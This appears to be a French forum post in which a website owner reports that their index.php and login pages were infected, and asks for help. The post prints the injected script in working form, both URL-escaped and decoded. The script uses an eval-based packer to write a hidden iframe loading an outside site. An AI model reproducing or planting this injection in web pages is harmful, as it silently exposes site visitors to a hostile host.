bonjour,
j'ai héberger un site web dans serveur, et après 3 semaines mes pages index.php et toutes les pages dont le nom contient login sont infectés par un virus qui insère le script suivant :
ayant la traduction suivante :
Code : Sélectionner tout - Visualiser dans une fenêtre à part
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23 <script language="javascript"> unescape('%65%76%61%6C%28%66%75%6E%63%74%69%6F%6E%28%68%4F%58%2C%73%6A%63%75 %2C%73%70%2C%49%41%76%42%2C%53%56%50%45%2C%74%77%68%29%7B%53%56%50%45%3D %66%75%6E%63%74%69%6F%6E%28%73%70%29%7B%72%65%74%75%72%6E%20%73%70%2E%74 %6F%53%74%72%69%6E%67%28%73%6A%63%75%29%7D%3B%69%66%28%21%27%27%2E%72%65 %70%6C%61%63%65%28%2F%5E%2F%2C%53%74%72%69%6E%67%29%29%7B%77%68%69%6C%65 %28%73%70%2D%2D%29%74%77%68%5B%53%56%50%45%28%73%70%29%5D%3D%49%41%76%42 %5B%73%70%5D%7C%7C%53%56%50%45%28%73%70%29%3B%49%41%76%42%3D%5B%66%75%6E %63%74%69%6F%6E%28%53%56%50%45%29%7B%72%65%74%75%72%6E%20%74%77%68%5B%53 %56%50%45%5D%7D%5D%3B%53%56%50%45%3D%66%75%6E%63%74%69%6F%6E%28%29%7B%72 %65%74%75%72%6E%27%5C%5C%77%2B%27%7D%3B%73%70%3D%31%7D%3B%77%68%69%6C%65 %28%73%70%2D%2D%29%69%66%28%49%41%76%42%5B%73%70%5D%29%68%4F%58%3D%68%4F %58%2E%72%65%70%6C%61%63%65%28%6E%65%77%20%52%65%67%45%78%70%28%27%5C%5C %62%27%2B%53%56%50%45%28%73%70%29%2B%27%5C%5C%62%27%2C%27%67%27%29%2C%49 %41%76%42%5B%73%70%5D%29%3B%72%65%74%75%72%6E%20%68%4F%58%7D%28%27%38%2E %30%28%22%3C%64%20%63%3D%5C%5C%22%62%3A%2F%2F%61%2E%39%2F%5C%5C%22%20%37 %3D%31%20%36%3D%31%20%35%3D%5C%5C%22%34%3A%33%3B%32%3A%65%5C%5C%22%3E%22 %29%3B%27%2C%31%35%2C%31%35%2C%27%77%72%69%74%65%7C%7C%70%6F%73%69%74%69 %6F%6E%7C%68%69%64%64%65%6E%7C%76%69%73%69%62%69%6C%69%74%79%7C%73%74%79 %6C%65%7C%68%65%69%67%68%74%7C%77%69%64%74%68%7C%64%6F%63%75%6D%65%6E%74 %7C%63%6F%6D%7C%61%76%65%72%73%62%6F%6E%6B%6F%7C%68%74%74%70%7C%73%72%63 %7C%69%66%72%61%6D%65%7C%61%62%73%6F%6C%75%74%65%27%2E%73%70%6C%69%74%28 %27%7C%27%29%2C%30%2C%7B%7D%29%29');</script>
Code : Sélectionner tout - Visualiser dans une fenêtre à part
1
2
3
4
5
6
7
8
9
10
11 <script language="javascript"> eval(function(hOX,sjcu,sp,IAvB,SVPE,twh) {SVPE=function(sp){return sp.toString(sjcu)};if(!''.replace(/^/,String)) {while(sp--)twh[SVPE(sp)]=IAvB[sp]||SVPE(sp);IAvB=[function(SVPE){return twh[SVPE]}];SVPE=function(){return'\\w+'};sp=1}; while(sp--)if(IAvB[sp])hOX=hOX.replace(new RegExp('\\b'+SVPE(sp)+' \\b','g'),IAvB[sp]);return hOX}('8.0("<d c=\\"b://a.9/\\" 7=1 6=1 5=\\"4:3;2:e\\">"); ',15,15,'write||position|hidden|visibility|style|height|width|document|com|aversbonko|http|src|iframe|absolute'.split('|'),0,{})); </script>
Partager